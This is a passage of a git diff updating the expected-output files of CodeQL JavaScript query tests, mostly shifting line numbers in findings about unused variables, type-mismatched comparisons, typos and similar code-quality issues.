b/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected index 1e5f4d643241..a5b1e0c00dfc 100644 
--- a/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected +++ b/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected @@ -1,3 +1,3 @@ -| instanceStatic.js:3:9:3:16 | this.baz | Access to instance method $@ from static method $@ is not possible through `this`. | instanceStatic.js:5:5:7:5 | baz(){\\n\\n } | baz | instanceStatic.js:2:5:4:5 | static ... K\\n } | bar | -| staticInstance.js:3:9:3:16 | this.baz | Access to static method $@ from instance method $@ is not possible through `this`. | staticInstance.js:5:5:6:5 | static baz(){\\n } | baz | staticInstance.js:2:5:4:5 | bar(){\\n ... K\\n } | bar | -| tst.js:66:9:66:14 | this.f | Access to instance method $@ from static method $@ is not possible through `this`. | tst.js:60:5:62:5 | f() {\\n\\n } | f | tst.js:65:5:67:5 | static ... K\\n } | test | +| instanceStatic.js:3:9:3:16 | this.baz | Access to instance method $@ from static method $@ is not possible through `this`. | instanceStatic.js:5:5:7:5 | baz(){\\n\\n } | baz | instanceStatic.js:2:5:4:5 | static ... t\\n } | bar | +| staticInstance.js:3:9:3:16 | this.baz | Access to static method $@ from instance method $@ is not possible through `this`. | staticInstance.js:5:5:6:5 | static baz(){\\n } | baz | staticInstance.js:2:5:4:5 | bar(){\\n ... t\\n } | bar | +| tst.js:66:9:66:14 | this.f | Access to instance method $@ from static method $@ is not possible through `this`. | tst.js:60:5:62:5 | f() {\\n\\n } | f | tst.js:65:5:67:5 | static ... t\\n } | test | diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected index 84d7d3d40fc9..3717fc460cea 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected 
+++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected @@ -1 +1 @@ -| tst.js:3:5:3:5 | s | This expression refers to $@ inside its temporal dead zone. | tst.js:4:5:4:17 | let s = "hi"; | s | +| tst.js:2:5:2:5 | s | This expression refers to $@ inside its temporal dead zone. | tst.js:3:5:3:17 | let s = "hi"; | s | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected index 34cf2d268dc8..f47146ae9b90 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected @@ -1,6 +1,6 @@ | istype.ts:18:15:18:18 | node | The parameter 'node' is never used. | | parameter_field.ts:6:15:6:15 | x | The parameter 'x' is never used. | | tst2.js:1:12:1:12 | x | The parameter 'x' is never used. | -| tst2.js:29:12:29:12 | x | The parameter 'x' is never used. | -| tst.js:7:32:7:34 | idx | The parameter 'idx' is never used. | -| tst.js:12:13:12:13 | x | The parameter 'x' is never used. | +| tst2.js:28:12:28:12 | x | The parameter 'x' is never used. | +| tst.js:6:32:6:34 | idx | The parameter 'idx' is never used. | +| tst.js:10:13:10:13 | x | The parameter 'x' is never used. | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected index 73be1f62b893..a188fe34545d 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected 
@@ -3,7 +3,7 @@ | decorated.ts:4:10:4:12 | fun | Unused function fun. | | eval.js:10:9:10:24 | not_used_by_eval | Unused variable not_used_by_eval. | | eval.js:19:9:19:24 | not_used_by_eval | Unused variable not_used_by_eval. | -| externs.js:6:5:6:13 | iAmUnused | Unused variable iAmUnused. | +| externs.js:5:5:5:13 | iAmUnused | Unused variable iAmUnused. | | importWithoutPragma.jsx:1:1:1:27 | import ... react'; | Unused import h. | | interTypes.ts:1:1:1:37 | import ... where"; | Unused import Bar. | | multi-imports.js:1:1:1:29 | import ... om 'x'; | Unused imports a, b, d. | diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected index 674fd74caee2..e94b40e1c1df 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected @@ -1,5 +1,5 @@ | EnablingNodeIntegration.js:5:28:11:9 | {\\n ... } | The `nodeIntegrationInWorker` feature has been enabled. | | EnablingNodeIntegration.js:5:28:11:9 | {\\n ... } | The `nodeIntegration` feature has been enabled. | | EnablingNodeIntegration.js:15:22:20:9 | {\\n ... } | The `nodeIntegration` feature is enabled by default. | -| EnablingNodeIntegration.js:23:16:27:9 | { // NO ... } | The `nodeIntegration` feature is enabled by default. | +| EnablingNodeIntegration.js:23:16:27:9 | { // $ ... } | The `nodeIntegration` feature is enabled by default. | | EnablingNodeIntegration.js:49:74:49:96 | {nodeIn ... : true} | The `nodeIntegration` feature has been enabled. | diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected index c82afd5c4cae..6ac9592a1bd2 100644 
--- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected @@ -1,3 +1,3 @@ | tst.js:2:9:2:24 | (x & (1< 0 | Potentially unsafe sign check of a bitwise operation. | -| tst.js:14:13:14:25 | (x >>> 0) > 0 | Potentially unsafe sign check of a bitwise operation. | -| tst.js:23:1:23:21 | (x & 0x ... 00) > 0 | Potentially unsafe sign check of a bitwise operation. | +| tst.js:13:13:13:25 | (x >>> 0) > 0 | Potentially unsafe sign check of a bitwise operation. | +| tst.js:21:1:21:21 | (x & 0x ... 00) > 0 | Potentially unsafe sign check of a bitwise operation. | diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected index 371b6251b87c..ae3d98f8f143 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected @@ -1,2 +1,2 @@ | tst.js:11:10:11:15 | y <= y | This expression compares $@ to itself. | tst.js:11:10:11:10 | y | y | -| tst.js:22:1:22:35 | (functi ... n() {}) | This expression compares $@ to itself. | tst.js:22:1:22:16 | (function() { }) | (function() { }) | +| tst.js:21:1:21:35 | (functi ... n() {}) | This expression compares $@ to itself. | tst.js:21:1:21:16 | (function() { }) | (function() { }) | diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected index 52517a4503e6..1f4a398b2af4 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected 
@@ -1,14 +1,14 @@ | try.js:22:9:22:26 | x.ordinaryProperty | This expression has no effect. | -| tst2.js:3:4:3:4 | 0 | This expression has no effect. | +| tst2.js:2:4:2:4 | 0 | This expression has no effect. | | tst.js:3:1:3:2 | 23 | This expression has no effect. | | tst.js:5:1:5:2 | 23 | This expression has no effect. | | tst.js:7:6:7:7 | 23 | This expression has no effect. | | tst.js:9:1:9:1 | 1 | This expression has no effect. | -| tst.js:23:1:23:1 | x | This expression has no effect. | -| tst.js:43:5:43:9 | "foo" | This expression has no effect. | -| tst.js:49:3:49:26 | new Err ... ou so") | This expression has no effect. | -| tst.js:50:3:50:49 | new Syn ... o me?") | This expression has no effect. | -| tst.js:51:3:51:36 | new Err ... age(e)) | This expression has no effect. | -| tst.js:62:2:62:20 | o.trivialNonGetter1 | This expression has no effect. | -| tst.js:78:24:78:24 | o | This expression has no effect. | +| tst.js:22:1:22:1 | x | This expression has no effect. | +| tst.js:42:5:42:9 | "foo" | This expression has no effect. | +| tst.js:48:3:48:26 | new Err ... ou so") | This expression has no effect. | +| tst.js:49:3:49:49 | new Syn ... o me?") | This expression has no effect. | +| tst.js:50:3:50:36 | new Err ... age(e)) | This expression has no effect. | +| tst.js:61:2:61:20 | o.trivialNonGetter1 | This expression has no effect. | +| tst.js:77:24:77:24 | o | This expression has no effect. | | uselessfn.js:1:1:1:15 | (functi ... .");\\n}) | This expression has no effect. | diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected index 62637a0bb38a..12142d56507f 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected 
@@ -1,53 +1,53 @@ | interprocedural.js:11:9:11:13 | known | Variable 'known' is of type string, but it is compared to $@ of type number. | interprocedural.js:11:19:11:20 | 42 | an expression | | interprocedural.js:15:9:15:18 | getKnown() | This expression is of type string, but it is compared to $@ of type number. | interprocedural.js:15:24:15:25 | 42 | an expression | | interprocedural.js:17:9:17:27 | getKnown_indirect() | This expression is of type string, but it is compared to $@ of type number. | interprocedural.js:17:33:17:34 | 42 | an expression | -| tst.js:2:5:2:17 | typeof window | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:2:23:2:31 | undefined | 'undefined' | -| tst.js:10:28:10:34 | "Hello" | This expression is of type string, but it is compared to $@ of type number. | tst.js:10:39:10:39 | 0 | an expression | -| tst.js:20:1:20:4 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:20:9:20:9 | 0 | an expression | -| tst.js:24:6:24:7 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:23:9:23:12 | "hi" | an expression | -| tst.js:28:1:28:23 | Object. ... ) + "!" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:28:28:28:36 | undefined | 'undefined' | -| tst.js:31:1:31:29 | (+f() \| ... + k())) | This expression is of type boolean, number or string, but it is compared to $@ of type undefined. | tst.js:31:34:31:42 | undefined | 'undefined' | -| tst.js:34:5:34:19 | !Module['load'] | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:34:24:34:34 | 'undefined' | an expression | -| tst.js:48:3:48:8 | number | Variable 'number' is of type number, but it is compared to $@ of type string. | tst.js:48:13:48:18 | "zero" | an expression | -| tst.js:52:1:52:1 | 0 | This expression is of type number, but it is compared to $@ of type object or undefined. 
| tst.js:52:5:52:43 | (Math.r ... [1, 2]) | an expression | -| tst.js:88:31:88:32 | x2 | Variable 'x2' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:88:38:88:41 | null | an expression | -| tst.js:91:35:91:36 | x3 | Variable 'x3' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:91:42:91:45 | null | an expression | -| tst.js:101:5:101:6 | x5 | Variable 'x5' cannot be of type null, but it is compared to $@ of type null. | tst.js:101:12:101:15 | null | an expression | -| tst.js:104:9:104:10 | x6 | Variable 'x6' cannot be of type null, but it is compared to $@ of type null. | tst.js:104:16:104:19 | null | an expression | -| tst.js:110:5:110:5 | o | Variable 'o' is of type object, but it is compared to $@ of type string. | tst.js:110:9:110:13 | "def" | an expression | -| tst.js:117:5:117:5 | a | Variable 'a' is of type object, but it is compared to $@ of type string. | tst.js:117:9:117:13 | "def" | an expression | -| tst.js:131:5:131:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:131:13:131:14 | 42 | an expression | -| tst.js:134:5:134:8 | true | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:134:13:134:17 | "bar" | an expression | -| tst.js:142:5:142:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:142:11:142:14 | "42" | an expression | -| tst.js:143:5:143:6 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:143:12:143:12 | b | variable 'b' | -| tst.js:144:5:144:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:144:11:144:11 | b | variable 'b' | -| tst.js:148:5:148:9 | "foo" | This expression is of type string, but it is compared to $@ of type undefined. 
| tst.js:148:15:148:23 | undefined | 'undefined' | -| tst.js:149:5:149:13 | undefined | 'undefined' is of type undefined, but it is compared to $@ of type string. | tst.js:149:19:149:23 | "foo" | an expression | -| tst.js:151:5:151:7 | NaN | 'NaN' is of type number, but it is compared to $@ of type string. | tst.js:151:13:151:17 | "foo" | an expression | -| tst.js:153:5:153:12 | Infinity | 'Infinity' is of type number, but it is compared to $@ of type string. | tst.js:153:18:153:22 | "foo" | an expression | -| tst.js:160:5:160:6 | t1 | Variable 't1' is of type number, but it is compared to $@ of type null. | tst.js:160:12:160:15 | null | an expression | -| tst.js:161:5:161:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:161:14:161:15 | t1 | variable 't1' | -| tst.js:164:5:164:6 | t2 | Variable 't2' is of type number or string, but it is compared to $@ of type null. | tst.js:164:12:164:15 | null | an expression | -| tst.js:165:5:165:8 | null | This expression is of type null, but it is compared to $@ of type number or string. | tst.js:165:14:165:15 | t2 | variable 't2' | -| tst.js:168:5:168:6 | t3 | Variable 't3' is of type number, string or undefined, but it is compared to $@ of type null. | tst.js:168:12:168:15 | null | an expression | -| tst.js:169:5:169:8 | null | This expression is of type null, but it is compared to $@ of type number, string or undefined. | tst.js:169:14:169:15 | t3 | variable 't3' | -| tst.js:172:5:172:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type null. | tst.js:172:12:172:15 | null | an expression | -| tst.js:173:5:173:8 | null | This expression is of type null, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:173:14:173:15 | t4 | variable 't4' | -| tst.js:176:5:176:6 | t5 | Variable 't5' cannot be of type null, but it is compared to $@ of type null. 
| tst.js:176:12:176:15 | null | an expression | -| tst.js:177:5:177:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:177:14:177:15 | t5 | variable 't5' | -| tst.js:180:5:180:6 | t6 | Variable 't6' cannot be of type null, but it is compared to $@ of type null. | tst.js:180:12:180:15 | null | an expression | -| tst.js:181:5:181:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:181:14:181:15 | t6 | variable 't6' | -| tst.js:184:5:184:6 | t7 | Variable 't7' cannot be of type null, but it is compared to $@ of type null. | tst.js:184:12:184:15 | null | an expression | -| tst.js:185:5:185:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:185:14:185:15 | t7 | variable 't7' | -| tst.js:188:5:188:6 | t8 | Variable 't8' cannot be of type null, but it is compared to $@ of type null. | tst.js:188:12:188:15 | null | an expression | -| tst.js:189:5:189:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:189:14:189:15 | t8 | variable 't8' | -| tst.js:202:5:202:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:202:12:202:13 | t4 | variable 't4' | -| tst.js:203:5:203:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function or regular expression. | tst.js:203:12:203:13 | t2 | variable 't2' | -| tst.js:204:5:204:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:204:12:204:13 | t4 | variable 't4' | -| tst.js:205:5:205:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function, object or regular expression. 
| tst.js:205:12:205:13 | t3 | variable 't3' |
-| tst.js:207:5:207:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ , which cannot be of type function or regular expression. | tst.js:207:12:207:13 | t5 | variable 't5' |
-| tst.js:208:5:208:6 | t5 | Variable 't5' cannot be of type function or regular expression, but it is compared to $@ of type function or regular expression. | tst.js:208:12:208:13 | t2 | variable 't2' |
-| tst.js:209:5:209:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, null, number, string or undefined. | tst.js:209:12:209:13 | t5 | variable 't5' |
-| tst.js:210:5:210:6 | t5 | Variable 't5' is of type boolean, null, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:210:12:210:13 | t3 | variable 't3' |
-| tst.js:225:13:225:14 | xy | Variable 'xy' is of type undefined, but it is compared to $@ of type string. | tst.js:225:20:225:24 | "foo" | an expression |
-| tst.js:233:5:233:5 | x | Variable 'x' is of type object, but it is compared to $@ of type number. | tst.js:233:11:233:12 | 42 | an expression |
+| tst.js:1:5:1:17 | typeof window | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:1:23:1:31 | undefined | 'undefined' |
+| tst.js:8:28:8:34 | "Hello" | This expression is of type string, but it is compared to $@ of type number. | tst.js:8:39:8:39 | 0 | an expression |
+| tst.js:17:1:17:4 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:17:9:17:9 | 0 | an expression |
+| tst.js:20:6:20:7 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:19:9:19:12 | "hi" | an expression |
+| tst.js:23:1:23:23 | Object. ... ) + "!" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:23:28:23:36 | undefined | 'undefined' |
+| tst.js:25:1:25:29 | (+f() \| ... + k())) | This expression is of type boolean, number or string, but it is compared to $@ of type undefined. | tst.js:25:34:25:42 | undefined | 'undefined' |
+| tst.js:27:5:27:19 | !Module['load'] | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:27:24:27:34 | 'undefined' | an expression |
+| tst.js:41:3:41:8 | number | Variable 'number' is of type number, but it is compared to $@ of type string. | tst.js:41:13:41:18 | "zero" | an expression |
+| tst.js:44:1:44:1 | 0 | This expression is of type number, but it is compared to $@ of type object or undefined. | tst.js:44:5:44:43 | (Math.r ... [1, 2]) | an expression |
+| tst.js:79:31:79:32 | x2 | Variable 'x2' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:79:38:79:41 | null | an expression |
+| tst.js:82:35:82:36 | x3 | Variable 'x3' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:82:42:82:45 | null | an expression |
+| tst.js:92:5:92:6 | x5 | Variable 'x5' cannot be of type null, but it is compared to $@ of type null. | tst.js:92:12:92:15 | null | an expression |
+| tst.js:95:9:95:10 | x6 | Variable 'x6' cannot be of type null, but it is compared to $@ of type null. | tst.js:95:16:95:19 | null | an expression |
+| tst.js:101:5:101:5 | o | Variable 'o' is of type object, but it is compared to $@ of type string. | tst.js:101:9:101:13 | "def" | an expression |
+| tst.js:108:5:108:5 | a | Variable 'a' is of type object, but it is compared to $@ of type string. | tst.js:108:9:108:13 | "def" | an expression |
+| tst.js:122:5:122:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:122:13:122:14 | 42 | an expression |
+| tst.js:125:5:125:8 | true | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:125:13:125:17 | "bar" | an expression |
+| tst.js:133:5:133:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:133:11:133:14 | "42" | an expression |
+| tst.js:134:5:134:6 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:134:12:134:12 | b | variable 'b' |
+| tst.js:135:5:135:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:135:11:135:11 | b | variable 'b' |
+| tst.js:139:5:139:9 | "foo" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:139:15:139:23 | undefined | 'undefined' |
+| tst.js:140:5:140:13 | undefined | 'undefined' is of type undefined, but it is compared to $@ of type string. | tst.js:140:19:140:23 | "foo" | an expression |
+| tst.js:142:5:142:7 | NaN | 'NaN' is of type number, but it is compared to $@ of type string. | tst.js:142:13:142:17 | "foo" | an expression |
+| tst.js:144:5:144:12 | Infinity | 'Infinity' is of type number, but it is compared to $@ of type string. | tst.js:144:18:144:22 | "foo" | an expression |
+| tst.js:151:5:151:6 | t1 | Variable 't1' is of type number, but it is compared to $@ of type null. | tst.js:151:12:151:15 | null | an expression |
+| tst.js:152:5:152:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:152:14:152:15 | t1 | variable 't1' |
+| tst.js:155:5:155:6 | t2 | Variable 't2' is of type number or string, but it is compared to $@ of type null. | tst.js:155:12:155:15 | null | an expression |
+| tst.js:156:5:156:8 | null | This expression is of type null, but it is compared to $@ of type number or string. | tst.js:156:14:156:15 | t2 | variable 't2' |
+| tst.js:159:5:159:6 | t3 | Variable 't3' is of type number, string or undefined, but it is compared to $@ of type null. | tst.js:159:12:159:15 | null | an expression |
+| tst.js:160:5:160:8 | null | This expression is of type null, but it is compared to $@ of type number, string or undefined. | tst.js:160:14:160:15 | t3 | variable 't3' |
+| tst.js:163:5:163:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type null. | tst.js:163:12:163:15 | null | an expression |
+| tst.js:164:5:164:8 | null | This expression is of type null, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:164:14:164:15 | t4 | variable 't4' |
+| tst.js:167:5:167:6 | t5 | Variable 't5' cannot be of type null, but it is compared to $@ of type null. | tst.js:167:12:167:15 | null | an expression |
+| tst.js:168:5:168:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:168:14:168:15 | t5 | variable 't5' |
+| tst.js:171:5:171:6 | t6 | Variable 't6' cannot be of type null, but it is compared to $@ of type null. | tst.js:171:12:171:15 | null | an expression |
+| tst.js:172:5:172:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:172:14:172:15 | t6 | variable 't6' |
+| tst.js:175:5:175:6 | t7 | Variable 't7' cannot be of type null, but it is compared to $@ of type null. | tst.js:175:12:175:15 | null | an expression |
+| tst.js:176:5:176:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:176:14:176:15 | t7 | variable 't7' |
+| tst.js:179:5:179:6 | t8 | Variable 't8' cannot be of type null, but it is compared to $@ of type null. | tst.js:179:12:179:15 | null | an expression |
+| tst.js:180:5:180:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:180:14:180:15 | t8 | variable 't8' |
+| tst.js:193:5:193:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:193:12:193:13 | t4 | variable 't4' |
+| tst.js:194:5:194:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function or regular expression. | tst.js:194:12:194:13 | t2 | variable 't2' |
+| tst.js:195:5:195:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:195:12:195:13 | t4 | variable 't4' |
+| tst.js:196:5:196:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:196:12:196:13 | t3 | variable 't3' |
+| tst.js:198:5:198:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ , which cannot be of type function or regular expression. | tst.js:198:12:198:13 | t5 | variable 't5' |
+| tst.js:199:5:199:6 | t5 | Variable 't5' cannot be of type function or regular expression, but it is compared to $@ of type function or regular expression. | tst.js:199:12:199:13 | t2 | variable 't2' |
+| tst.js:200:5:200:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, null, number, string or undefined. | tst.js:200:12:200:13 | t5 | variable 't5' |
+| tst.js:201:5:201:6 | t5 | Variable 't5' is of type boolean, null, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:201:12:201:13 | t3 | variable 't3' |
+| tst.js:216:13:216:14 | xy | Variable 'xy' is of type undefined, but it is compared to $@ of type string. | tst.js:216:20:216:24 | "foo" | an expression |
+| tst.js:224:5:224:5 | x | Variable 'x' is of type object, but it is compared to $@ of type number. | tst.js:224:11:224:12 | 42 | an expression |
diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected
index 3168aa8b1a0b..51a9ebb1f0a3 100644
--- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected
+++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected
@@ -1,17 +1,17 @@
-| tst.js:2:1:2:7 | !method | This expression will be implicitly converted from boolean to string. |
-| tst.js:17:6:17:9 | null | This expression will be implicitly converted from null to object. |
-| tst.js:20:6:20:13 | 'string' | This expression will be implicitly converted from string to object. |
-| tst.js:26:13:26:53 | "Settin ... o '%s'" | This expression will be implicitly converted from string to number. |
-| tst.js:29:18:29:26 | !callback | This expression will be implicitly converted from boolean to object. |
-| tst.js:53:5:53:10 | void 0 | This expression will be implicitly converted from undefined to number. |
-| tst.js:61:3:61:3 | x | This expression will be implicitly converted from undefined to number. |
-| tst.js:67:8:67:8 | y | This expression will be implicitly converted from undefined to number. |
-| tst.js:73:5:73:5 | x | This expression will be implicitly converted from undefined to number. |
-| tst.js:79:19:79:22 | name | This expression will be implicitly converted from undefined to string. |
-| tst.js:85:3:85:3 | x | This expression will be implicitly converted from undefined to number. |
-| tst.js:100:5:100:7 | f() | This expression will be implicitly converted from undefined to number. |
-| tst.js:106:5:106:7 | g() | This expression will be implicitly converted from undefined to number. |
-| tst.js:109:13:109:15 | g() | This expression will be implicitly converted from undefined to number. |
-| tst.js:110:13:110:15 | g() | This expression will be implicitly converted from undefined to string. |
-| tst.js:117:8:117:8 | y | This expression will be implicitly converted from string to number. |
-| tst.js:122:10:122:10 | y | This expression will be implicitly converted from string to number. |
+| tst.js:1:1:1:7 | !method | This expression will be implicitly converted from boolean to string. |
+| tst.js:15:6:15:9 | null | This expression will be implicitly converted from null to object. |
+| tst.js:17:6:17:13 | 'string' | This expression will be implicitly converted from string to object. |
+| tst.js:22:13:22:53 | "Settin ... o '%s'" | This expression will be implicitly converted from string to number. |
+| tst.js:24:18:24:26 | !callback | This expression will be implicitly converted from boolean to object. |
+| tst.js:47:5:47:10 | void 0 | This expression will be implicitly converted from undefined to number. |
+| tst.js:54:3:54:3 | x | This expression will be implicitly converted from undefined to number. |
+| tst.js:59:8:59:8 | y | This expression will be implicitly converted from undefined to number. |
+| tst.js:64:5:64:5 | x | This expression will be implicitly converted from undefined to number. |
+| tst.js:69:19:69:22 | name | This expression will be implicitly converted from undefined to string. |
+| tst.js:74:3:74:3 | x | This expression will be implicitly converted from undefined to number. |
+| tst.js:89:5:89:7 | f() | This expression will be implicitly converted from undefined to number. |
+| tst.js:95:5:95:7 | g() | This expression will be implicitly converted from undefined to number. |
+| tst.js:98:13:98:15 | g() | This expression will be implicitly converted from undefined to number. |
+| tst.js:99:13:99:15 | g() | This expression will be implicitly converted from undefined to string. |
+| tst.js:106:8:106:8 | y | This expression will be implicitly converted from string to number. |
+| tst.js:111:10:111:10 | y | This expression will be implicitly converted from string to number. |
diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected
index 1bf8599b8be5..05bc8f28ad14 100644
--- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected
+++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected
@@ -1,6 +1,6 @@
-| tst.js:5:19:5:24 | lenght | 'lenght' may be a typo for 'length'. |
-| tst.js:26:5:26:10 | lenght | 'lenght' may be a typo for 'length'. |
-| tst.js:26:16:26:21 | lenght | 'lenght' may be a typo for 'length'. |
-| tst.js:32:27:32:34 | avalable | 'avalable' may be a typo for 'available'. |
-| tst.js:42:5:42:12 | throught | 'throught' may be a typo for 'through' or 'throughout'. |
-| tst.js:43:5:43:9 | sheat | 'sheat' may be a typo for 'cheat', 'sheath' or 'sheet'. |
+| tst.js:4:19:4:24 | lenght | 'lenght' may be a typo for 'length'. |
+| tst.js:24:5:24:10 | lenght | 'lenght' may be a typo for 'length'. |
+| tst.js:24:16:24:21 | lenght | 'lenght' may be a typo for 'length'. |
+| tst.js:29:27:29:34 | avalable | 'avalable' may be a typo for 'available'. |
+| tst.js:39:5:39:12 | throught | 'throught' may be a typo for 'through' or 'throughout'. |
+| tst.js:40:5:40:9 | sheat | 'sheat' may be a typo for 'cheat', 'sheath' or 'sheet'. |
diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected
index e97b3e8fe783..fcdf350a9268 100644
--- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected
+++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected
@@ -1,5 +1,5 @@
 | jsdoc.js:9:5:9:19 | this.y = this.y | This expression assigns property y to itself. |
 | jsdoc.js:11:5:11:23 | this.arg = this.arg | This expression assigns property arg to itself. |
-| tst.js:5:2:5:14 | width = width | This expression assigns variable width to itself. |
-| tst.js:24:1:24:19 | array[1] = array[1] | This expression assigns element 1 to itself. |
